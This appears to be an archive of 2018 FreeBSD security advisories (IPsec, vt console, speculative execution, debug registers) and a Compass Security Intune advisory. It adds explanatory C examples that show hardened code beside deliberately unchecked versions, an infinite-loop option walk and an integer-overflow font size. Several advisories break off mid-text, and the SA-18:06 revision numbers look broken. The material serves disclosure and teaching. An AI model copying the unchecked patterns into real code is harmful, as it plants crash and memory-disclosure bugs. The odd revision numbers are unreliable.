FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 11.1]
# fetch https://security.FreeBSD.org/patches/SA-18:06/debugreg.11.1.patch
# fetch https://security.FreeBSD.org/patches/SA-18:06/debugreg.11.1.patch.asc
# gpg --verify debugreg.11.1.patch.asc

[FreeBSD 10.4]
# fetch https://security.FreeBSD.org/patches/SA-18:06/debugreg.10.4.patch
# fetch https://security.FreeBSD.org/patches/SA-18:06/debugreg.10.4.patch.asc
# gpg --verify debugreg.10.4.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile and install your kernel as described in
<URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/10/                                                        r70
releng/10.4/                                                      r71
stable/11/                                                        r69
releng/11.1/                                                      r71
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<URL:https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8897>

The latest revision of this advisory is available at
<URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-18:06.debugreg.asc>
-BEGIN PGP SIGNATURE-

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlrx3HhfFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cK/jhAAmPPCFZRMvbyG0VBCBqo5COFZ/32IMOWFDGMlsSi+CEgcGM51SzYZi97c
zsT/2RgMsvBdggk41wvXqp1gKxgIbJe22af7l+D18e6rDEesueJqSiizcHmfGQul
X

FreeBSD Security Advisory FreeBSD-SA-18:05.ipsec

2018-04-04 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-18:05.ipsec  Security Advisory
  The FreeBSD Project

Topic:  ipsec crash or denial of service

Category:   core
Module: ipsec
Announced:  2018-04-04
Credits:Maxime Villard
Affects:All supported versions of FreeBSD.
Corrected:  2018-01-31 09:24:48 UTC (stable/11, 11.1-STABLE)
2018-04-04 05:37:52 UTC (releng/11.1, 11.1-RELEASE-p9)
2018-01-31 09:26:28 UTC (stable/10, 10.4-STABLE)
2018-04-04 05:37:52 UTC (releng/10.4, 10.4-RELEASE-p8)
2018-04-04 05:37:52 UTC (releng/10.3, 10.3-RELEASE-p29)
CVE Name:   CVE-2018-6918

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

The IPsec suite of protocols provide network level security for IPv4 and IPv6
packets.  FreeBSD includes software originally developed by the KAME project
which implements the various protocols that make up IPsec.

In IPsec, the IP Authentication Header (AH) is used to provide protection
against replay attacks and connectionless integrity and data origin
authentication for IP datagrams.

II.  Problem Description

The length field of the option header does not count the size of the option
header itself.  This causes a problem when the length is zero: the offset is
then advanced by zero, so the loop over the options never terminates.

In addition there are pointer/offset mistakes in the handling of IPv4
options.

III. Impact

A remote attacker who is able to send an arbitrary packet, could cause the
remote target machine to crash.

IV.  Workaround

No workaround is available.  Note that in FreeBSD 10 IPsec is not included
in the kernel by default, but it is in FreeBSD 11.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

Afterward, reboot the system.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterward, reboot the system.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-18:05/ipsec.patch
# fetch https://security.FreeBSD.org/patches/SA-18:05/ipsec.patch.asc
# gpg --verify ipsec.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/10/                                                        r328621
releng/10.3/                                                      r331985
releng/10.4/                                                      r331985
stable/11/                                                        r328620
releng/11.1/                                                      r331985
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<URL:https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6918>

The latest revision of this advisory is available at
<URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-18:05.ipsec.asc>
-BEGIN PGP SIGNATURE-

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlrEZuRfFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cKpOxAAlcyr88qHimXmMWNelNe+RvNkRoQwlmOw5XCWmWFGt4bX6KyrPSNVkZXK
9bZr0+sYiEjHPstXy+F6v95wqShRiefwpLVNJkP6LFKdQJeuxy0Uwsgl/i3aZVHy
q4iM+PgnMwt5FxzmIcFHjwZSGGaOw5p9dMlkFLxXQ6chafPutMbgkXMIGVGXEp4e
iwQgmh7j5LbUED0P9G7sYpcEN+DKZLW
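
The walk below is an added example written for this digest, not FreeBSD's AH
code. It shows the bounded option walk that the missing length check implies,
on the options area of an IPv4 header as AH has to traverse it when zeroing
mutable options before the ICV is computed (RFC 4302, section 3.3.3.1.1.1).
The function names, the mutable-type subset and the option bytes are
constructed for the example. The IPv6 extension-header case, where the option
length excludes the two header bytes, advances by optlen + 2 and so cannot
stall on a zero length; there the bound that matters is off + 2 + optlen <= len.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Standard IPv4 option type codes (RFC 791); names are the usual ones. */
#define IPOPT_EOL   0     /* end of list: single byte, no length   */
#define IPOPT_NOP   1     /* no-operation: single byte, no length  */
#define IPOPT_RR    7     /* record route: mutable in transit      */
#define IPOPT_TS    68    /* timestamp: mutable in transit         */

/* Subset of the RFC 4302 mutable classification, enough for this example. */
static int ipopt_is_mutable(uint8_t type)
{
    return type == IPOPT_RR || type == IPOPT_TS;
}

/* Hardened walk (hypothetical name) over the options area of one IPv4
 * header (IHL*4 - 20 bytes), run on the scratch copy used for the ICV.
 * Mutable options are zeroed whole, type and length bytes included.
 * Returns the number of options seen, or -1 if the area is malformed. */
int ah_zero_mutable_ipv4_options(uint8_t *opts, size_t len)
{
    size_t off = 0;
    int n = 0;

    while (off < len) {
        uint8_t type = opts[off], optlen;
        if (type == IPOPT_EOL)
            break;
        if (type == IPOPT_NOP) {
            off++; n++;
            continue;
        }
        /* Every other option has a length byte that counts the type and
         * length bytes themselves, so a value below 2 can never be valid. */
        if (off + 1 >= len)
            return -1;                /* no room for the length byte */
        optlen = opts[off + 1];
        if (optlen < 2)
            return -1;                /* zero: the walk would never advance */
        if (optlen > len - off)
            return -1;                /* option runs past the header */
        if (ipopt_is_mutable(type))
            memset(opts + off, 0, optlen);
        off += optlen; n++;
    }
    return n;
}

/* The unchecked shape: advance by whatever the length byte says. A loop of
 * this shape spins forever on a zero length; this copy gives up after
 * 'budget' rounds and returns -2 so the stall can be observed, not hung on. */
int ipv4_options_walk_unchecked(const uint8_t *opts, size_t len, int budget)
{
    size_t off = 0;
    int n = 0;

    while (off < len) {
        uint8_t type = opts[off];
        if (type == IPOPT_EOL)
            break;
        if (type == IPOPT_NOP) {
            off++; n++;
            continue;
        }
        if (budget-- == 0)
            return -2;                /* still at the same offset */
        off += opts[off + 1];         /* zero => same offset next round */
        n++;
    }
    return n;
}

/* 1 if a constructed options area (NOP, 7-byte record route, EOL, padding)
 * yields two options with the NOP intact and the record route zeroed. */
int demo_good(void)
{
    uint8_t buf[12] = { IPOPT_NOP, IPOPT_RR, 7, 4, 10, 0, 0, 1, IPOPT_EOL, 0, 0, 0 };

    if (ah_zero_mutable_ipv4_options(buf, sizeof buf) != 2 || buf[0] != IPOPT_NOP)
        return 0;
    for (size_t i = 1; i < 8; i++)
        if (buf[i] != 0)
            return 0;
    return 1;
}

/* -1: the hardened walk rejects a zero-length option outright. */
int demo_zero_len_hardened(void)
{
    uint8_t buf[4] = { IPOPT_RR, 0, 0, 0 };       /* constructed */
    return ah_zero_mutable_ipv4_options(buf, sizeof buf);
}

/* -2: the unchecked walk never leaves offset 0. */
int demo_zero_len_unchecked(void)
{
    const uint8_t buf[4] = { IPOPT_RR, 0, 0, 0 }; /* constructed */
    return ipv4_options_walk_unchecked(buf, sizeof buf, 64);
}
```

The three demo functions return 1, -1 and -2. The -1 is the case the fix adds
(a length byte below 2, which in the unchecked loop leaves the offset where it
was), and the -2 stands in for a stall that a kernel would never return from.
The same walk also refuses an option whose declared length runs past the end
of the header, which is the second class of mistake the advisory mentions.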

FreeBSD Security Advisory FreeBSD-SA-18:04.vt

2018-04-04 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-18:04.vt Security Advisory
  The FreeBSD Project

Topic:  vt console memory disclosure

Category:   core
Module: vt console
Announced:  2018-04-04
Credits:Dr Silvio Cesare of InfoSect
Affects:All supported versions of FreeBSD.
Corrected:  2018-04-04 05:24:59 UTC (stable/11, 11.1-STABLE)
2018-04-04 05:33:56 UTC (releng/11.1, 11.1-RELEASE-p9)
2018-04-04 05:26:33 UTC (stable/10, 10.4-STABLE)
2018-04-04 05:33:56 UTC (releng/10.4, 10.4-RELEASE-p8)
2018-04-04 05:33:56 UTC (releng/10.3, 10.3-RELEASE-p29)
CVE Name:   CVE-2018-6917

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

On FreeBSD 11 and later, and FreeBSD 10.x systems that boot via UEFI, the
default system video console is provided by the vt(4) driver.  The console
allows the user, including an unprivileged user, to load a font at runtime.

II.  Problem Description

Insufficient validation of user-provided font parameters can result in an
integer overflow, leading to the use of arbitrary kernel memory as glyph
data.  Characters that reference this data can be displayed on the screen,
effectively disclosing kernel memory.

III. Impact

Unprivileged users may be able to access privileged kernel data.

Such memory might contain sensitive information, such as portions of the file
cache or terminal buffers.  This information might be directly useful, or it
might be leveraged to obtain elevated privileges in some way; for example,
a terminal buffer might include a user-entered password.

IV.  Workaround

The syscons sc(4) system console is not affected by this issue and may be
used on systems that do not boot via UEFI.  To use the syscons console,
set the kern.vty tunable in /boot/loader.conf as described in sc(4), and
reboot.  No workaround is available for systems that boot via UEFI.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

A reboot is required after the upgrade.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-18:04/vt.patch
# fetch https://security.FreeBSD.org/patches/SA-18:04/vt.patch.asc
# gpg --verify vt.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/10/                                                        r331983
releng/10.3/                                                      r331984
releng/10.4/                                                      r331984
stable/11/                                                        r331982
releng/11.1/                                                      r331984
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<URL:https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6917>

The latest revision of this advisory is available at
<URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-18:04.vt.asc>
-BEGIN PGP SIGNATURE-

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlrEZttfFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cI5CBAAmZS+2l3qNafZ0FQDKONeX+j
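
An added example, not vt(4) code, showing the shape of the bug the advisory
describes: a bitmap size computed as bytes-per-row times height times glyph
count in 32-bit arithmetic wraps for a hostile glyph count, so the kernel
sizes or validates far less memory than the glyph indices can address, and a
glyph lookup walks into whatever follows the buffer. The struct, the function
names and the parameters are constructed for the illustration; the real vt(4)
font format and its checks are not reproduced here.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Hypothetical font header: 8-bit glyph dimensions and a 32-bit glyph
 * count, all of them taken from the user-supplied blob. */
struct font_params {
    uint8_t  width;         /* glyph width in pixels        */
    uint8_t  height;        /* glyph height in pixels       */
    uint32_t glyph_count;   /* glyphs in the bitmap section */
};

/* Bytes per glyph: height rows of ceil(width / 8) bytes, at most 32 * 255. */
static uint32_t glyph_bytes(const struct font_params *p)
{
    return ((uint32_t)p->width + 7) / 8 * p->height;
}

/* Unchecked: the 32-bit product silently wraps for a large glyph_count. */
uint32_t font_bitmap_size_unchecked(const struct font_params *p)
{
    return glyph_bytes(p) * p->glyph_count;
}

/* Checked: rejects degenerate dimensions and any glyph_count whose product
 * with the per-glyph size does not fit in 32 bits. Returns 0 and sets
 * *size, or -1 without touching *size. */
int font_bitmap_size_checked(const struct font_params *p, uint32_t *size)
{
    uint32_t per_glyph;

    if (p->width == 0 || p->height == 0 || p->glyph_count == 0)
        return -1;
    per_glyph = glyph_bytes(p);
    if (p->glyph_count > UINT32_MAX / per_glyph)
        return -1;                  /* per_glyph * glyph_count would wrap */
    *size = per_glyph * p->glyph_count;
    return 0;
}

/* 1 if glyph 'index', although it passes the usual index < glyph_count test,
 * lies outside an allocation of 'alloc_len' bytes. Computed in 64 bits so
 * the comparison itself cannot wrap. */
int font_glyph_escapes(const struct font_params *p, uint32_t index,
                       size_t alloc_len)
{
    uint64_t start = (uint64_t)index * glyph_bytes(p);

    if (index >= p->glyph_count)
        return 0;                   /* the index check already rejects it */
    return start + glyph_bytes(p) > alloc_len;
}

/* Constructed parameters (not from any real font file): 8x16 glyphs, with
 * glyph_count chosen so that 16 * glyph_count = 2^32 + 16, which wraps to 16. */
static const struct font_params hostile = { 8, 16, 0x10000001u };
static const struct font_params sane    = { 8, 16, 256 };

uint32_t demo_wrapped_size(void)        /* 16 bytes for a 4 GiB font */
{
    return font_bitmap_size_unchecked(&hostile);
}

int demo_checked_rejects(void)          /* -1 */
{
    uint32_t size;
    return font_bitmap_size_checked(&hostile, &size);
}

uint32_t demo_checked_size(void)        /* 4096 for the sane font */
{
    uint32_t size = 0;
    return font_bitmap_size_checked(&sane, &size) == 0 ? size : 0;
}

int demo_second_glyph_escapes(void)     /* 1: glyph 1 starts at byte 16 */
{
    return font_glyph_escapes(&hostile, 1, demo_wrapped_size());
}

int main(void)
{
    printf("unchecked=%u checked=%d sane=%u escapes=%d\n",
           demo_wrapped_size(), demo_checked_rejects(),
           demo_checked_size(), demo_second_glyph_escapes());
    return 0;
}
```

The point of the last demo is that the usual index < glyph_count test is
satisfied for every one of the 268 million glyphs the hostile header claims,
yet only the first glyph fits in the 16 bytes the wrapped size accounts for;
every other index resolves to memory beyond the buffer, which is the "arbitrary
kernel memory as glyph data" the advisory describes. The division-based check
is the portable form; on compilers that provide it, __builtin_mul_overflow
expresses the same test.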

CSNC-2017-026 Microsoft Intune - Preserved Keychain Entries

2018-03-20 Thread Advisories
#
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#
#
# Product:  Microsoft Intune [1]
# Vendor:   Microsoft
# CSNC ID:  CSNC-2017-026
# Subject:  Preserved Keychain Entries
# Risk: Medium
# Effect:   Locally exploitable
# Author:   Stephan Sekula <stephan.sek...@compass-security.com>
# Date: 31.08.2017
#
#

Introduction:
-
Define a mobile management strategy that fits the needs of your organization. 
Apply flexible mobile device and app management controls that let employees 
work with the devices and apps they choose while protecting your company 
information. [1]

Compass Security discovered a design weakness in Microsoft Intune's iOS 
Keychain management. This allows users to access company data even after the 
device has been unenrolled.


Technical Description
-
If a user's device, which is enrolled with their company's MDM, is unenrolled, 
their Office access tokens are not removed from the iOS Keychain. Furthermore, 
the respective tokens are not invalidated on the server-side. Therefore, if the 
user reinstalls Office to their device after unenrollment, they may again 
obtain full access to the company's files.


Workaround / Fix:
-
This issue can be fixed by invalidating the user's access token on the server- 
and client-side. In addition, the Keychain items could also be encrypted with a 
key stored in the app's data directory. Since this key is removed with the data 
directory on uninstallation of the app, this renders the Keychain entry useless.


Timeline:
-
2017-08-22  Discovery by Stephan Sekula
2017-09-17  Initial vendor notification
2017-09-18  Initial vendor response
2017-10-04  Asking vendor for update
2017-10-04  Vendor replies that engineers are working on reproducing the issue
2017-11-01  Asking vendor for an update
2017-11-02  Vendor replies - They are waiting for a partner team to respond on 
the case.
2018-01-08  Asking vendor for update - No response
2018-02-12  Asking vendor for update - No response
2018-03-19  Public disclosure


References:
---
[1] https://www.microsoft.com/en-us/cloud-platform/microsoft-intune


FreeBSD Security Advisory FreeBSD-SA-18:03.speculative_execution

2018-03-14 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-18:03.speculative_execution  Security Advisory
  The FreeBSD Project

Topic:  Speculative Execution Vulnerabilities

Category:   core
Module: kernel
Announced:  2018-03-14
Credits:Jann Horn (Google Project Zero); Werner Haas, Thomas
Prescher (Cyberus Technology); Daniel Gruss, Moritz Lipp,
Stefan Mangard, Michael Schwarz (Graz University of
Technology); Paul Kocher; Daniel Genkin (University of
Pennsylvania and University of Maryland), Mike Hamburg
(Rambus); Yuval Yarom (University of Adelaide and Data6)
Affects:All supported versions of FreeBSD.
Corrected:  2018-02-17 18:00:01 UTC (stable/11, 11.1-STABLE)
2018-03-14 04:00:00 UTC (releng/11.1, 11.1-RELEASE-p8)
CVE Name:   CVE-2017-5715, CVE-2017-5754

Special Note:   Speculative execution vulnerability mitigation is a work
in progress.  This advisory addresses the most significant
issues for FreeBSD 11.1 on amd64 CPUs.  We expect to update
this advisory to include 10.x for amd64 CPUs.  Future FreeBSD
releases will address this issue on i386 and other CPUs.
freebsd-update will include changes on i386 as part of this
update due to common code changes shared between amd64 and
i386, however it contains no functional changes for i386 (in
particular, it does not mitigate the issue on i386).

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

Many modern processors have implementation issues that allow unprivileged
attackers to bypass user-kernel or inter-process memory access restrictions
by exploiting speculative execution and shared resources (for example,
caches).

II.  Problem Description

A number of issues relating to speculative execution were found last year
and publicly announced January 3rd.  Two of these, known as Meltdown and
Spectre V2, are addressed here.

CVE-2017-5754 (Meltdown)
- 

This issue relies on an affected CPU speculatively executing instructions
beyond a faulting instruction.  When this happens, changes to architectural
state are not committed, but observable changes may be left in micro-
architectural state (for example, cache).  This may be used to infer
privileged data.

CVE-2017-5715 (Spectre V2)
- --

Spectre V2 uses branch target injection to speculatively execute kernel code
at an address under the control of an attacker.

III.  Impact

An attacker may be able to read secret data from the kernel or from a
process when executing untrusted code (for example, in a web browser).

IV.  Workaround

No workaround is available.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date,
and reboot.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility, followed
by a reboot into the new kernel:

# freebsd-update fetch
# freebsd-update install
# shutdown -r now

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 11.1]
# fetch 
https://security.FreeBSD.org/patches/SA-18:03/speculative_execution-amd64-11.patch
# fetch 
https://security.FreeBSD.org/patches/SA-18:03/speculative_execution-amd64-11.patch.asc
# gpg --verify speculative_execution-amd64-11.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

CVE-2017-5754 (Meltdown)
- 

The mitigation is known as Page Table Isolation (PTI).  PTI largely separates
kernel and user mode page tables, so that even during speculative execution
most of the kernel's data is unmapped and not accessible.

A demonstration of the Meltdown vulnerability is available at
https://github.com/dag-erling/meltdown.  A positive result is definitive
(that is, the vulnerability exists with certainty).  A negative result
indicates either that the CPU is not affected, or that the test is not
capable of demonstr

FreeBSD Security Advisory FreeBSD-SA-18:01.ipsec [REVISED]

2018-03-07 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-18:01.ipsec [REVISED]Security Advisory
  The FreeBSD Project

Topic:  ipsec validation and use-after-free

Category:   core
Module: ipsec
Announced:  2018-03-07
Credits:Maxime Villard
Affects:All supported versions of FreeBSD.
Corrected:  2018-02-24 13:04:02 UTC (stable/11, 11.1-STABLE)
2018-03-07 05:53:35 UTC (releng/11.1, 11.1-RELEASE-p7)
2018-03-07 16:55:15 UTC (stable/10, 10.4-STABLE)
2018-03-07 17:16:41 UTC (releng/10.4, 10.4-RELEASE-p7)
2018-03-07 17:16:41 UTC (releng/10.3, 10.3-RELEASE-p28)
CVE Name:   CVE-2018-6916

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>.

0.   Revision History

v1.0  2018-03-07 Initial release.
v1.1  2018-03-08 Correct patch for 10.x releases.

I.   Background

The IPsec suite of protocols provide network level security for IPv4 and IPv6
packets.  FreeBSD includes software originally developed by the KAME project
which implements the various protocols that make up IPsec.

In IPsec, the IP Authentication Header (AH) is used to provide protection
against replay attacks and connectionless integrity and data origin
authentication for IP datagrams.

II.  Problem Description

Due to a lack of strict checking, an attacker from a trusted host can
send a specially constructed IP packet that may lead to a system crash.

Additionally, a use-after-free vulnerability in the AH handling code could
cause unpredictable results.

III. Impact

Access to out of bounds or freed mbuf data can lead to a kernel panic or
other unpredictable results.

IV.  Workaround

No workaround is available, but systems not using IPsec are not vulnerable.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date,
and reboot the system.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
And reboot the system

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

[*** v1.1 NOTE ***] If your 10.x sources were already patched using the
initially published advisory patches, you need to apply the
ipsec-10.rev1.patch. If you had not yet patched your 10.x sources, you need
only apply the ipsec-10.patch file. 11.1 sources were correct in the initial
release and do not need to be updated.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 10.x system not patched with the original SA-18:01 patch]
# fetch https://security.FreeBSD.org/patches/SA-18:01/ipsec-10.patch
# fetch https://security.FreeBSD.org/patches/SA-18:01/ipsec-10.patch.asc
# gpg --verify ipsec-10.patch.asc

[FreeBSD 10.x that had been patched with the original SA-18:01 patch]
# fetch https://security.FreeBSD.org/patches/SA-18:01/ipsec-10.rev1.patch
# fetch https://security.FreeBSD.org/patches/SA-18:01/ipsec-10.rev1.patch.asc
# gpg --verify ipsec-10.rev1.patch.asc

[FreeBSD 11.1]
# fetch https://security.FreeBSD.org/patches/SA-18:01/ipsec-11.patch
# fetch https://security.FreeBSD.org/patches/SA-18:01/ipsec-11.patch.asc
# gpg --verify ipsec-11.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/10/                                                       r330609
releng/10.3/                                                     r330611
releng/10.4/                                                     r330611
stable/11/                                                       r329907
releng/11.1/                                                     r330566
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.f

FreeBSD Security Advisory FreeBSD-SA-18:01.ipsec

2018-03-07 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-18:01.ipsec  Security Advisory
  The FreeBSD Project

Topic:  ipsec validation and use-after-free

Category:   core
Module: ipsec
Announced:  2018-03-07
Credits:        Maxime Villard
Affects:        All supported versions of FreeBSD.
Corrected:  2018-02-24 13:04:02 UTC (stable/11, 11.1-STABLE)
2018-03-07 05:53:35 UTC (releng/11.1, 11.1-RELEASE-p7)
2018-03-07 05:47:48 UTC (stable/10, 10.4-STABLE)
2018-03-07 05:53:35 UTC (releng/10.4, 10.4-RELEASE-p6)
2018-03-07 05:53:35 UTC (releng/10.3, 10.3-RELEASE-p27)
CVE Name:   CVE-2018-6916

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

The IPsec suite of protocols provides network level security for IPv4 and IPv6
packets.  FreeBSD includes software originally developed by the KAME project
which implements the various protocols that make up IPsec.

In IPsec, the IP Authentication Header (AH) is used to provide protection
against replay attacks and connectionless integrity and data origin
authentication for IP datagrams.

II.  Problem Description

Due to a lack of strict checking, an attacker from a trusted host can
send a specially constructed IP packet that may lead to a system crash.

Additionally, a use-after-free vulnerability in the AH handling code could
cause unpredictable results.

III. Impact

Access to out of bounds or freed mbuf data can lead to a kernel panic or
other unpredictable results.

IV.  Workaround

No workaround is available, but systems not using IPsec are not vulnerable.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.
And reboot the system.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
And reboot the system

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 10.x]
# fetch https://security.FreeBSD.org/patches/SA-18:01/ipsec-10.patch
# fetch https://security.FreeBSD.org/patches/SA-18:01/ipsec-10.patch.asc
# gpg --verify ipsec-10.patch.asc

[FreeBSD 11.1]
# fetch https://security.FreeBSD.org/patches/SA-18:01/ipsec-11.patch
# fetch https://security.FreeBSD.org/patches/SA-18:01/ipsec-11.patch.asc
# gpg --verify ipsec-11.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/10/                                                       r330565
releng/10.3/                                                     r330566
releng/10.4/                                                     r330566
stable/11/                                                       r329907
releng/11.1/                                                     r330566
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<URL:https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6916>

The latest revision of this advisory is available at
<URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-18:01.ipsec.asc>
-BEGIN PGP SIGNATURE-

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlqfhClfFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cISCQ//f9bjAzuou4wlbaoVBp+csfE8qwJl0PJAs/guwO9dO/TMLrVzJ+oNtAIR
VO6T7j2uC/eLD80PFsGoTpDAm4O1gqcGGX4OZm/6rE/OdqC3/

